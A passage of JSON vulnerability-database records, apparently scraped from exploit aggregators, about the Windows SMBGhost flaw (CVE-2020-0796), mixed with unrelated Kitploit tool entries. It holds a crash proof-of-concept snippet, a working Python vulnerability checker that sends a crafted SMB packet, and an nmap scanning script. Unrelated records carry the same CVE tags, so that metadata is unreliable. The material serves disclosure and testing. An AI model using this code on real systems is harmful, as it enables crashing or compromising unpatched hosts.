"HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "Microsoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34097", "href": "https://0day.today/exploit/description/34097", "sourceData": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)\n\n\n# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip\n\n## Usage\n\n`./CVE-2020-0796.py servername`\n\nThis script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.\n\nThis contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. 
A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.\n\nThe compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.\n\n```python\n    def _compress(self, b_data, session):\n        header = SMB2CompressionTransformHeader()\n        header['original_size'] = len(b_data)\n        header['offset'] = 4294967295\n        header['data'] = smbprotocol.lznt1.compress(b_data)\n```\n\n## About\n\nCVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression capabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).\n\nOnce a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.\n\nCVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. 
With further work, this could be developed into a RCE exploit.\n", "sourceHref": "https://0day.today/exploit/34097", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-15T17:12:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-17T00:00:00", "type": "zdt", "title": "Microsoft Windows SMB 3.1.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-17T00:00:00", "id": "1337DAY-ID-34105", "href": "https://0day.today/exploit/description/34105", "sourceData": "# Exploit Title: Windows SMBv3 Client/Server Remote Code Execution\nVulnerability - remote\n# Author: nu11secur1ty\n# Vendor: https://smb.wsu.edu/\n# Link:\nhttps://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796\n# CVE: CVE-2020-0796\n\n\n\n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)\n[+] Website: https://www.nu11secur1ty.com/\n[+] Source: readme from GitHUB\n[+] twitter.com/nu11secur1ty\n\n\n[Exploit Program Code]\n--------------------------------------\nimport socket\nimport 
struct\nimport sys\n\nsmbsuckmickey_mouse = b'\\x00\\x00\\x00\\xc0\\xfeSMB@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x02\\x10\\x02\"\\x02$\\x02\\x00\\x03\\x02\\x03\\x10\\x03\\x11\\x03\\x00\\x00\\x00\\x00\\x01\\x00&\\x00\\x00\\x00\\x00\\x00\\x01\\x00 \\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\nsock = socket.socket(socket.AF_INET)\nsock.settimeout(3)\nsock.connect(( sys.argv[1], 445 ))\nsock.send(smbsuckmickey_mouse)\n\nnb, = struct.unpack(\">I\", sock.recv(4))\nres = sock.recv(nb)\n\nif not res[68:70] == b\"\\x11\\x03\":\n    exit(\"Not vulnerable.\")\nif not res[70:72] == b\"\\x02\\x00\":\n    exit(\"Not vulnerable.\")\n\nexit(\"Vulnerable.\")\n\n--------------------------------------\n\n#!/usr/bin/bash\nif [ $# -eq 0 ]\nthen\necho $'Usage:\\n\\vulnsmb.sh TARGET_IP_or_CIDR'\nexit 1\nfi\necho \"Checking if there's SMB v3.11 in\" $1 \"...\"\nnmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\\d+\\.\\d+\\.\\d+\\.\\d+|^\\|.\\s+3.11' | tr '\\n' ' ' | replace 'Nmap scan report for' '@' | tr \"@\" \"\\n\" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\\d+\\.\\d+\\.\\d+\\.\\d+'\nif [[ $? 
!= 0 ]]; then\necho \"There's no SMB v3.11\"\nfi\n\n-------------------------------------\n\n[Vendor]\nMicrosoft\n\n\n[Product]\nhttps://smb.wsu.edu/\n\n\n[Vulnerability Type]\nRemote + Layer 2\n\n\n\n[Security Issue]\nThe security update addresses the vulnerability by correcting how the SMBv3\nprotocol handles these specially crafted requests.\n\n\n[References]\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796\nA remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 3.1.1 (SMBv3) protocol handles certain requests.\nAn attacker who successfully exploited the vulnerability could gain the\nability to execute code on the target server or client.\nTo exploit the vulnerability against a server, an unauthenticated attacker\ncould send a specially crafted packet to a targeted SMBv3 server.\nTo exploit the vulnerability against a client, an unauthenticated attacker\nwould need to configure a malicious SMBv3 server and convince a user to\nconnect to it.\nThe security update addresses the vulnerability by correcting how the SMBv3\nprotocol handles these specially crafted requests.\n\n[Network Access]\nRemote + Layer 2\n\n\n[Disclosure Timeline]\nPublished: 03/12/2020\n\n\n[+] Disclaimer\nThe entry creation date may reflect when the CVE ID was allocated or\nreserved,\nand does not necessarily indicate when this vulnerability was discovered,\nshared\nwith the affected vendor, publicly disclosed, or updated in CVE.\n", "sourceHref": "https://0day.today/exploit/34105", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:03:04", "description": "[](<https://1.bp.blogspot.com/-LKxabESDj14/XoKTgYcGw8I/AAAAAAAASM8/bIZc6Rafbdo_hDoPJa5CB_gyUxG0sZH8wCK4BGAsYHg/CVE-2020-0796_1.gif>)\n\n \n\n\nWindows SMBv3 LPE Exploit\n\n \n**Authors** \n\n\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](<https://twitter.com/danigargu> \"@danigargu\" ))\n * Manuel Blanco Paraj\u00f3n 
([@dialluvioso_](<https://twitter.com/dialluvioso_> \"@dialluvioso_\" ))\n \n**References** \n\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n * <https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html>\n * <https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter>\n * <https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/>\n * <http://blogs.360.cn/post/CVE-2020-0796.html>\n * <https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/>\n \n \n\n\n**[Download CVE-2020-0796](<https://github.com/danigargu/CVE-2020-0796> \"Download CVE-2020-0796\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-31T00:50:00", "type": "kitploit", "title": "CVE-2020-0796 - Windows SMBv3 LPE Exploit #SMBGhost", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-31T00:50:42", "id": "KITPLOIT:7720212798779518234", "href": 
"http://www.kitploit.com/2020/03/cve-2020-0796-windows-smbv3-lpe-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-18T12:06:35", "description": "[](<https://1.bp.blogspot.com/-KHGlAt6h7zA/XoKSZMHlGpI/AAAAAAAASMg/Nwi18b4Lt1Yh1j27FYxFAhzzRfLxDRFEACK4BGAsYHg/CVE-2020-0796-POC_1_demo.gif>)\n\n \n\n\n(c) 2020 ZecOps, Inc. - <https://www.zecops.com> \\- Find Attackers' Mistakes\n\nPOC to check for CVE-2020-0796 / \"SMBGhost\" \nExpected outcome: Blue Screen \nIntended only for educational and [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) in corporate environments. \nZecOps takes no responsibility for the code, use at your own risk. \nPlease contact some-email@example.com if you are interested in agent-less DFIR tools for Servers, Endpoints, and Mobile Devices to detect SMBGhost and other types of attacks automatically.\n\n \n**Usage** \n\n\n`CVE-2020-0796-POC.exe [<TargetServer>]`\n\nIf `<TargetServer>` is omitted, the POC is executed on localhost (`127.0.0.1`).\n\n \n\n\n**Compiled POC** \n\n\nYou can get the compiled POC [here](<https://github.com/ZecOps/CVE-2020-0796-POC/releases> \"here\" ).\n\n \n**Compiling** \n\n\nUse Visual Studio to compile the following projects:\n\n 1. `ProtoSDK\\Asn1Base\\Asn1Base.csproj`\n 2. `ProtoSDK\\MS-XCA\\Xca.csproj`\n 3. 
`ProtoSDK\\MS-SMB2\\Smb2.sln`\n\nUse the resulting exe file to run the POC.\n\n \n**References** \n\n\n * [Vulnerability Reproduction: CVE-2020-0796 POC - ZecOps Blog](<https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/> \"Vulnerability Reproduction: CVE-2020-0796 POC - ZecOps Blog\" )\n * [CVE-2020-0796 - ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796> \"CVE-2020-0796 -\" )[Microsoft](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Security Response Center\n * [SMBGhost ](<https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html> \"SMBGhost\" )[Analysis](<https://www.kitploit.com/search/label/Analysis> \"Analysis\" ) \\- Lucas Georges\n \n \n\n\n**[Download CVE-2020-0796-POC](<https://github.com/ZecOps/CVE-2020-0796-POC> \"Download CVE-2020-0796-POC\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-31T00:47:00", "type": "kitploit", "title": "CVE-2020-0796 - CVE-2020-0796 Pre-Auth POC", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": 
"2020-03-31T00:47:28", "id": "KITPLOIT:5857572574369273543", "href": "http://www.kitploit.com/2020/03/cve-2020-0796-cve-2020-0796-pre-auth-poc.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T10:54:00", "description": "[  ](<https://2.bp.blogspot.com/-eh5dzO_d7iE/U4DlRl7quNI/AAAAAAAACg4/TmLE71qVZpk/s1600/Securely+and+anonymously+share+a+file+of+any+size.png>)\n\n \n\n\nOnionShare lets you securely and anonymously share a file of any size with someone. It works by starting a web server, making it accessible as a Tor hidden service, and generating an unguessable URL access and download the file. It doesn't require setting up a server on the internet somewhere or using a third party filesharing service. You host the file on your own computer and use a Tor hidden service to make it temporarily accessible over the internet. The other user just needs to use Tor Browser to download the file from you. \n\n \n \n\n\n[ Download Onionshare ](<https://github.com/micahflee/onionshare>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-24T18:35:28", "type": "kitploit", "title": "Onionshare - Securely and anonymously share a file of any size", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-24T18:35:28", "id": "KITPLOIT:7904361679234881900", "href": "http://www.kitploit.com/2014/05/onionshare-securely-and-anonymously.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T06:43:58", "description": "[  ](<https://1.bp.blogspot.com/-i4ByqGzN4XQ/U4VDBNpjtuI/AAAAAAAACiQ/e1LQK5dLDok/s1600/kali-1.0.7-released.png>)\n\n \n\n\n[ ](<https://www.kali.org/author/muts/>)\n\n \n\n\n#### Kernel 3.14, Tool Updates, Package Improvements \n\nKali linux 1.0.7 has just been released, complete with a whole bunch of tool updates, a new kernel, and some cool new features. Check out our [ changelog ](<https://bugs.kali.org/changelog_page.php> \"Kali Linux Changelog\" ) for a full list of these items. As usual, you don\u2019t need to re-download or re-install Kali to benefit from these updates \u2013 you can update to the latest and greatest using these simple commands: \n\n \n \n apt-get update\n apt-get dist-upgrade\n # If you've just updated your kernel, then:\n reboot\n\n#### Kali Linux Encrypted USB Persistence \n\nOne of the new sought out features introduced (which is also partially responsible for the kernel update) is the ability to create [ Kali Linux Live USB with LUKS Encrypted Persistence ](<https://www.offensive-security.com/kali-linux/kali-encrypted-usb-persistence/> \"Kali Linux LIVE with LUKS Encrypted USB Persistence \" ) . This feature ushers in a new era of secure Kali Linux USB portability, allowing us to either boot to a \u201cclean\u201d Kali image or alternatively, overlay it with the contents of a persistent encrypted partition, all within the same USB drive. \n\n#### Tool Developers Ahoy! 
\n\nThis release also marks the beginning of some co-ordinated efforts between Kali developers and tool developers to make sure their tools are represented correctly and are fully functional within Kali Linux. We would like to thank the metasploit, w3af, and wpscan dev teams for working with us to perfect their Kali packages and hope that more tool developers join in. Tool developers are welcome to send us an email to  and we\u2019ll be happy to work with you to better integrate your tool into Kali. \n\n#### Kali Linux: Greater Than the Sum of its Parts \n\nFor quite some time now, we\u2019ve been preaching that Kali Linux is more than a \u201cLinux distribution with a collection of tools in it\u201d. We invest a significant of time and resources developing and enabling features in the distribution which we think are useful for penetration testers and other security professionals. These features range from things like \u201c ** live-build ** \u201c, which allows our end users to easily customize their own Kali ISOs to features like ** Live USB persistence encryption ** , which provides paranoid users with an extra layer of security. Many of these features are unique to Kali and can be found nowhere else. We\u2019ve started tallying these features and linking them from our [ Kali documentation page ](<https://www.kali.org/official-documentation/> \"Official Documentation\" ) \u2013 check it out, it\u2019s growing to be an impressive list! \n\n#### Torrents, Virtual Machine & ARM images \n\n \n\n\nIn the next few days, [ Offensive Security ](<https://www.offensive-security.com/> \"Offensive Security Training\" ) will post Virtual Machine and custom ARM images for the 1.0.7 release. We will announce the availability of these images via our blogs and Twitter feeds, so stay tuned!. 
\n\n \n\n\n \n\n\n** [ Source ](<https://www.kali.org/news/kali-linux-1-0-7-released/>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-28T02:04:47", "type": "kitploit", "title": "Kali Linux 1.0.7 Released", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-28T02:04:47", "id": "KITPLOIT:8455936192163161094", "href": "http://www.kitploit.com/2014/05/kali-linux-107-released.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:42:24", "description": "[  ](<https://2.bp.blogspot.com/-TcwB9LPd9fE/U4KoNjeKgiI/AAAAAAAAChU/RYyHB5IYxh0/s1600/Productivity+Tool.png>)\n\n \n\n\nHave you ever spent ages trying to find the results of a particular portscan you were sure you did? Or grepping through a bunch of files looking for data for a particular host or service? Or copy-pasting bits of output from a bunch of typescripts into a report? We certainly did, and that's why we wrote MagicTree - so that it does such mind-numbing stuff for us, while we spend our time hacking. 
\n\n \n\n\nMagicTree is a penetration tester productivity tool. It is designed to allow easy and straightforward data consolidation, querying, external command execution and (yeah!) report generation. In case you wonder, \"Tree\" is because all the data is stored in a tree structure, and \"Magic\" is because it is designed to magically do the most cumbersome and boring part of penetration testing - data management and reporting. \n\n \n** Installation ** \n\n\nNo installation is required for MagicTree. The application is distributed as a single JAR file which has to be executed with JRE. Just save the file on your desktop. Double-click on it to execute it or, for less user-friendly OSes, issue the \u201cjava -jar MagicTree.jar\u201d command. \n \n \n\n\n[ ** Download MagicTree ** ](<http://www.gremwell.com/download>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2014-05-26T02:36:37", "type": "kitploit", "title": "MagicTree - Penetration Tester Productivity Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15126", "CVE-2020-0796"], "modified": "2014-05-26T02:36:37", "id": 
"KITPLOIT:5374829754140275290", "href": "http://www.kitploit.com/2014/05/magictree-penetration-tester.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-02T08:44:44", "description": "[  ](<https://1.bp.blogspot.com/-Q3RM4C1vfqI/U4P-skRxCRI/AAAAAAAACiA/M0qMzm4YPpE/s1600/hashcat-logo.png>)\n\n \n\n\n_ ** oclHashcat ** _ is a GPGPU-based multi-hash cracker using a brute-force attack (implemented as mask attack), combinator attack, dictionary attack, hybrid attack, mask attack, and rule-based attack. \n\n \n\n\nThis GPU cracker is a fusioned version of oclHashcat-plus and oclHashcat-lite. \n\n \n\n\n** GPU Driver requirements: **\n\n * NV users require ForceWare 331.67 or later \n * AMD users require Catalyst 14.4 or later \n\n### ** Changelog v1.21 **\n\nThis release is focused on performance increase / bugfixes. \n\n * Added support for algorithm -m 2612 = PHPS \n * Added support for algorithm -m 8600 = Lotus Notes/Domino 5 \n * Added support for algorithm -m 8700 = Lotus Notes/Domino 6 \n * Fixed performance drop on descrypt, LM and oracle-old initiated by AMD drivers \n * Fixed problem with restoring ADL performance state when the clock size reported by the AMD driver didn\u2019t respect the clock step size \n * Fixed problem with setting ADL powertune value for r9 295\u00d72 GPUs \n * Added support for writing logfiles \n * Added parameter \u2013logfile-disable which should be self-explaining \n * Dictstat is now no longer session dependent and will always be based on oclHashcat installation directory \n * Use AMD custom profile settings instead of basing the AMD powertune/clock settings on maximum supported clock values \n * Fixed VLIW size calculated by compute capability was broken for sm_50 -> cuModuleLoad() 301 \n * Make \u2013runtime count relative to real attack start not program start \n * Fixed bug with fan speed handling, if fan speed is manually set to a high enought value (e.g. 
100%) oclHashcat shouldn\u2019t change it \n * Problem with username parsing (\u2013username) was fixed \n * Fixed problem where IKE-PSK sha1/md5 (-m 5300/-m 5400) were wrongly recognized as shadow file formats \n * Fixed problem where the \u2018delete range\u2019 rule (xNM) did not allow to remove charaters at the very end of the word \n\nFull Changelog: [ here ](<https://hashcat.net/forum/thread-3422.html>)\n\n \n\n\n### ** Features **\n\n * Worlds fastest password cracker \n * Worlds first and only GPGPU based rule engine \n * Free \n * Multi-GPU (up to 128 gpus) \n * Multi-Hash (up to 100 million hashes) \n * Multi-OS (Linux & Windows native binaries) \n * Multi-Platform (OpenCL & CUDA support) \n * Multi-Algo (see below) \n * Low resource utilization, you can still watch movies or play games while cracking \n * Focuses highly iterated modern hashes \n * Focuses dictionary based attacks \n * Supports distributed cracking \n * Supports pause / resume while cracking \n * Supports sessions \n * Supports restore \n * Supports reading words from file \n * Supports reading words from stdin \n * Supports hex-salt \n * Supports hex-charset \n * Built-in benchmarking system \n * Integrated thermal watchdog \n * 100+ Algorithms implemented with performance in mind \n\n \n\n\n### ** Attack-Modes **\n\n * Straight (accept Rules) \n * Combination \n * Brute-force \n * Hybrid dict + mask \n * Hybrid mask + dict \n\n \n\n\n** Algorithms **\n\n * MD4 \n * MD5 \n * SHA1 \n * SHA-256 \n * SHA-512 \n * SHA-3 (Keccak) \n * RipeMD160 \n * Whirlpool \n * GOST R 34.11-94 \n * HMAC-MD5 (key = $pass) \n * HMAC-MD5 (key = $salt) \n * HMAC-SHA1 (key = $pass) \n * HMAC-SHA1 (key = $salt) \n * HMAC-SHA256 (key = $pass) \n * HMAC-SHA256 (key = $salt) \n * HMAC-SHA512 (key = $pass) \n * HMAC-SHA512 (key = $salt) \n * LM \n * NTLM \n * DCC \n * DCC2 \n * NetNTLMv1 \n * NetNTLMv1 + ESS \n * NetNTLMv2 \n * Kerberos 5 AS-REQ Pre-Auth etype 23 \n * AIX {smd5} \n * AIX {ssha1} \n * AIX {ssha256} 
\n * AIX {ssha512} \n * FreeBSD MD5 \n * OpenBSD Blowfish \n * descrypt \n * md5crypt \n * bcrypt \n * sha256crypt \n * sha512crypt \n * DES(Unix) \n * MD5(Unix) \n * SHA256(Unix) \n * SHA512(Unix) \n * OSX v10.4 \n * OSX v10.5 \n * OSX v10.6 \n * OSX v10.7 \n * OSX v10.8 \n * OSX v10.9 \n * Cisco-ASA \n * Cisco-IOS \n * Cisco-PIX \n * GRUB 2 \n * Juniper Netscreen/SSG (ScreenOS) \n * RACF \n * Samsung Android Password/PIN \n * MSSQL \n * MySQL \n * Oracle \n * Postgres \n * Sybase \n * DNSSEC (NSEC3) \n * IKE-PSK \n * IPMI2 RAKP \n * iSCSI CHAP \n * WPA \n * WPA2 \n * 1Password, cloudkeychain \n * 1Password, agilekeychain \n * Lastpass \n * Password Safe SHA-256 \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES \n * TrueCrypt 5.0+ PBKDF2 HMAC-SHA512 + AES \n * TrueCrypt 5.0+ PBKDF2 HMAC-Whirlpool + AES \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES + boot-mode \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES + hidden-volume \n * TrueCrypt 5.0+ PBKDF2 HMAC-SHA512 + AES + hidden-volume \n * TrueCrypt 5.0+ PBKDF2 HMAC-Whirlpool + AES + hidden-volume \n * TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES + hidden-volume + boot-mode \n * SAP CODVN B (BCODE) \n * SAP CODVN F/G (PASSCODE) \n * Citrix Netscaler \n * Netscape LDAP SHA/SSHA \n * Apache MD5-APR \n * hMailServer \n * EPiServer \n * Drupal \n * IPB \n * Joomla \n * MyBB \n * 